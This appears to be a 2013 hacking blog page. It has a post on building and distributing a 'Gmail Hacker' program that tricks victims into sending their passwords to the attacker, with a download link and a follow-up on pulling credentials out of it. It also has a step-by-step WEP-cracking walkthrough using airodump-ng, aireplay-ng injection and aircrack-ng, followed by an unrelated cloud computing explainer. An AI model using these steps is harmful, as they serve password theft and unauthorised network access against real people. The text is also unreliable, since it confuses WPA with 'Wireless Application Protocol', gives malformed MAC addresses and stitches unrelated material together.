Wednesday 27 February 2013

HACK GMAIL ACCOUNTS : GMAIL HACKER















  

 This software will hack Gmail accounts. All you need is a bit of social engineering. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Gmail Hacker Builder.exe file on your computer.
3. Enter in your Gmail address and password (I created a new Gmail ID to test this and I recommend you to do the same). Hit on Build. Then Gmail hacker builder will create your own Gmail hacker application - Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim of which you wanna hack Gmail password and convince him that this Gmail hacker can hack Gmail password (Social Engineering as I already said).
5. Ask him to run Gmail Hacker.exe and enter all information including his Gmail ID and password and Gmail ID of victim he wanna hack. As he enters this information and hits "Hack Them", he will receive an error message
6. You will receive an email in your account containing his password. Enjoy!!!

Download here:

http://adf.ly/JydVi

HACK THE HACKER : BIN TEXT

Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:

http://adf.ly/Jydgv



 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCYxgEn645NGTEekNdS3PM5RaW9TiOZbwQVhk_0tCKfMi051QwtnjLsBZscwrsSzRk-LLexWOi889o5Wt-22p_Cy3nHDnYUDwdoYluGKONhriJ6-qqSdHR6swMFY326q3QsvaZjPnGRDE/s1600/Untitled.jpg

Tuesday 26 February 2013

HOW TO HACK WIRELESS NETWORKS

HOW TO HACK WIRELESS NETWORKS

Hey guys due to numerous of questions on this, i had to post this again. Comment if you come across a problem.

1) First we need to scan for available wireless networks.
There's a great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac
It’ll also show how the Wi-fi network is secured..
The two most common encryption types are:
1) WEP

2) WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
Here I’ll show you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP. (i showed you how to install this earlier-please refer to that post)
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.
3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).
4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.
5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.
6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
8) Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Cloud Computing

­Let's say you're an executive at a large corporation. Your particular responsibilities include making sure that all of your employees have the right hardware and software they need to do their jobs. Buying computers for everyone isn't enough -- you also have to purchase software or software licenses to give employees the tools they require. Whenever you have a new hire, you have to buy more software or make sure your current software license allows another user. It's so stressful that you find it difficult to go to sleep on your huge pile of money every night.
Soon, there may be an alternative for executives like you. Instead of installing a suite of software for each computer, you'd only have to load one application. That application would allow workers to log into a Web-based service which hosts all the programs the user would need for his or her job. Remote machines owned by another company would run everything from e-mail to word processing to complex data analysis programs. It's called cloud computing, and it could change the entire computer industry.
In a cloud computing system, there's a significant workload shift. Local computers no longer have to do all the heavy lifting when it comes to running applications. The network of computers that make up the cloud handles them instead. Hardware and software demands on the user's side decrease. The only thing the user's computer needs to be able to run is the cloud computing system's interface software, which can be as simple as a Web browser, and the cloud's network takes care of the rest.
There's a good chance you've already used some form of cloud computing. If you have an e-mail account with a Web-based e-mail service like Hotmail, Yahoo! Mail or Gmail, then you've had some experience with cloud computing. Instead of running an e-mail program on your computer, you log in to a Web e-mail account remotely. The software and storage for your account doesn't exist on your computer -- it's on the service's computer cloud.